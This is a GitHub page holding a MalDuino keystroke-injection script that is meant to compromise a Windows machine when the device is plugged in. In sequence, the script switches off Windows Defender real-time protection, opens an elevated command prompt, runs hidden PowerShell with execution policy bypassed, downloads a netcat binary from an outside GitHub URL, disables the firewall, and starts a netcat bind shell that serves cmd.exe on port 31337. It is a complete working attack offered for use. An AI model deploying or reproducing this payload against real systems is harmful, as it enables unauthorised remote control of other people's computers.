-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathmalduino_nc_reverse_shell.txt
More file actions
70 lines (69 loc) · 2.04 KB
/
malduino_nc_reverse_shell.txt
File metadata and controls
70 lines (69 loc) · 2.04 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
DELAY 1000
REM Open Windows Defender settings
CTRL ESC
DELAY 1000
STRING Windows Defender Settings
DELAY 100
ENTER
REM Navigate to realtime protection and disable it
DELAY 1000
ENTER
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 250
TAB
DELAY 250
TAB
DELAY 250
TAB
ENTER
DELAY 1000
SPACE
DELAY 1000
ALT y
DELAY 500
ALT F4
DELAY 100
ALT F4
DELAY 100
GUI r
DELAY 200
STRING cmd
DELAY 200
CTRL SHIFT ENTER
DELAY 500
ALT y
DELAY 500
ESC
STRING cd %temp%
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Client' -Force}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')"
DELAY 100
ENTER
DELAY 2000
STRING netsh advfirewall set allprofiles state off
DELAY 100
ENTER
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "%temp%\nc.exe -Lp 31337 -vv -e cmd.exe"
DELAY 100
ENTER
STRING exit
DELAY 100
ENTER